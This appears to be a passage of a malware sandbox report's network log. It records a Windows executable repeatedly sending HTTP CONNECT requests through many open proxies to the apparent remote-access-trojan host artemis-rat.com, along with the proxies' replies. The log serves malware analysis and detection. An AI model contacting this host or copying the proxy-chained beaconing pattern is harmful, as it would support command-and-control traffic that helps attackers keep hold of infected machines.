                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            27192.168.2.54980020.33.5.2788883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.492280006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.474437952 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.360048056 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.384021997 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.368083954 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.272279024 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:27.400398970 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.276422977 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            28192.168.2.549796201.91.82.15531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.494658947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.166440010 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.139245987 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.224004984 CET  19  IN  HTTP/1.1 200 OK


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
29192.168.2.54984292.204.135.37269273876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.495670080 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.014184952 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.670506001 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.983014107 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.702316046 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.389868975 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
30192.168.2.549877167.172.158.5580003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.562263966 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
31192.168.2.54985472.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.562437057 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
32192.168.2.54981843.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.562813997 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
33192.168.2.549887178.128.156.21980003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.562913895 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
34192.168.2.54983388.99.138.2150883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.563111067 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
35192.168.2.549822121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.563747883 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
36192.168.2.549798113.143.37.8290023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.565491915 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.900496006 CET  311  IN  HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
37192.168.2.54991145.12.31.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:37.568027973 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.722847939 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:37 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
38192.168.2.549923162.159.242.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.577557087 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.738769054 CET    316    IN    HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
39192.168.2.549946104.21.85.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.580738068 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.734850883 CET    316    IN    HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
40192.168.2.549863134.209.29.12031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.580898046 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.740596056 CET    28    IN    HTTP/1.1 400 Bad Request


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
41192.168.2.549837103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.593560934 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
42192.168.2.549931162.214.121.173645793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.604768038 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
43192.168.2.5499345.78.65.91803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.613709927 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:37.811405897 CET    316    IN    HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
44192.168.2.54989351.15.230.100163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.642817020 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.279825926 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.883793116 CET    536    IN    HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
45192.168.2.54996238.7.18.10280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp    Bytes transferred    Direction    Data
Mar 11, 2024 03:30:37.643650055 CET    223    OUT    CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.860241890 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            46192.168.2.549868103.107.84.12480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.658664942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.022778988 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            47192.168.2.54997051.222.241.157225383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.662381887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.186081886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.842346907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139267921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905107021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499165058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093183041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            48192.168.2.55008442.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.663938046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            49192.168.2.55008742.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.664611101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            50192.168.2.55009042.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.666461945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            51192.168.2.55009542.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.667911053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            52192.168.2.54988920.24.43.21481233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.670852900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.012877941 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            53192.168.2.54998338.162.4.24231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.673753023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.088875055 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            54192.168.2.54993098.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.678803921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            55192.168.2.549933161.132.125.24480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:37.703052044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.311095953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
